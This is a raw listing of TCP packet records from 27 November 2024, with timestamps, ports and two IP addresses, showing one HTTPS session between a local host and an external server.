Nov 27, 2024 16:29:39.136447906 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.143069983 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.143095970 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.143138885 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.143153906 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.143167973 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.143191099 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.149744987 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.149765015 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.149833918 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.149844885 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.149887085 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.155900955 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.155919075 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.155970097 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.155978918 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.155989885 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.156017065 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.163034916 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.163058043 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.163095951 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.163110971 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.163122892 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.163153887 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.169934988 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.169953108 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.170011997 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.170020103 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.170046091 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.170063019 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.212362051 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.212387085 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.212434053 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.212461948 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.212486029 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.212498903 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.388704062 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.388741970 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.388894081 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.388907909 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.388958931 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.395392895 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.395411968 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.395493984 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.395500898 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.395539999 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.402224064 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.402241945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.402313948 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.402319908 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.402362108 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.409044981 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.409064054 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.409140110 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.409145117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.409184933 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.415112019 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.415133953 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.415226936 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.415234089 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.415270090 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.421947002 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.421966076 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.422032118 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.422036886 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.422076941 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.428765059 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.428783894 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.428854942 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.428860903 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.428903103 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.435153961 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.435173988 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.435237885 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.435245037 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.435285091 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.592206955 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.592235088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.592396021 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.592417002 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.592458963 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.599267960 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.599323034 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.599406958 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.599415064 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.599468946 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.605166912 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.605184078 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.605289936 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.605295897 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.605343103 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.612267017 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.612283945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.612381935 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.612389088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.612432003 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.618798018 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.618813992 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.619000912 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.619008064 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.619052887 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.625252008 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.625267029 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.625339031 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.625345945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.625389099 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.632409096 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.632426023 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.632491112 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.632498026 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.632541895 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.638982058 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.638998032 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.639127970 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.639134884 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.639203072 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.794034958 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.794058084 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.794173002 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.794205904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.794251919 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.800918102 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.800935030 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.801008940 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.801021099 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.801069021 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.807269096 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.807286024 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.807375908 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.807384014 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.807424068 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.813694954 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.813711882 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.813785076 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.813791990 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.813839912 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.820635080 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.820651054 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.820723057 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.820730925 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.820770979 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.827117920 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.827135086 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.827208996 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.827215910 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.827255011 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.833924055 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.833940983 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.834011078 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.834026098 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.834074974 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.840048075 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.840066910 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.840147018 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.840162039 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.840204000 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.995477915 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.995501041 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.995646000 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.995671988 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.995718956 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.002348900 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.002371073 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.002460003 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.002468109 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.002509117 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.008739948 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.008763075 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.008830070 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.008836985 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.008863926 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.008878946 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.015186071 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.015203953 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.015284061 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.015290976 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.015331984 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.022031069 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.022067070 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.022116899 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.022123098 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.022156000 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.022166967 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.028469086 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.028486013 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.028572083 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.028578043 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.028626919 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.035406113 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.035428047 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.035496950 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.035506964 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.035552979 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.041450977 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.041467905 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.041538954 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.041547060 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.041591883 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.214015007 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.214051008 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.214241028 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.214293957 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.214345932 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.220947981 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.220963955 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.221076965 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.221085072 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.221127987 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.227018118 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.227046013 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.227140903 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.227149010 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.227195978 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.233840942 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.233858109 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.233959913 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.233967066 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.234009981 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.240588903 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.240606070 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.240693092 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.240710020 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.240753889 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.246979952 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.246999025 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.247081995 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.247088909 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.247133017 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.253882885 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.253901005 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.254002094 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.254009008 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.254043102 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.260054111 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.260077000 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.260168076 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.260175943 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.260217905 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.415914059 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.415935993 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.416007042 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.416022062 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.416066885 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.422056913 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.422075033 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.422144890 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.422152042 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.422188997 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.428987026 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.429003000 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.429056883 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.429064035 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.429101944 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.435129881 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.435148001 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.435223103 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.435230017 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.435290098 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.441906929 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.441929102 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.441978931 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.441984892 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.442018032 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.442039967 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.448432922 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.448451042 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.448517084 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.448522091 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.448555946 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.448577881 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.455086946 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.455104113 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.455194950 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.455200911 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.455250025 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.462074995 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.462119102 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.462194920 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.462199926 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.462244034 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.618000031 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.618037939 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.618190050 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.618216038 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.618264914 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.623811960 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.623836994 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.623955965 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.623965025 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.624011040 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.632411957 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.632435083 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.632527113 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.632534981 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.632576942 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.637572050 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.637597084 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.637645960 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.637653112 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.637701035 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.644391060 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.644411087 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.644514084 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.644520044 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.644562006 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.650110006 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.650129080 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.650190115 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.650197029 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.650226116 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.650248051 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.657634020 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.657651901 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.657713890 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.657732010 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.657744884 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.657773018 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.663710117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.663741112 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.663805008 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.663827896 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.663876057 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.663933039 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.818885088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.818912029 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.818977118 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.819001913 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.819015980 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.819053888 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.825112104 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.825136900 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.825184107 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.825191975 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.825221062 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.825237036 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.832040071 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.832076073 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.832123041 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.832129955 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.832150936 CET	49730	443	192.168.2.4	79.141.173.158
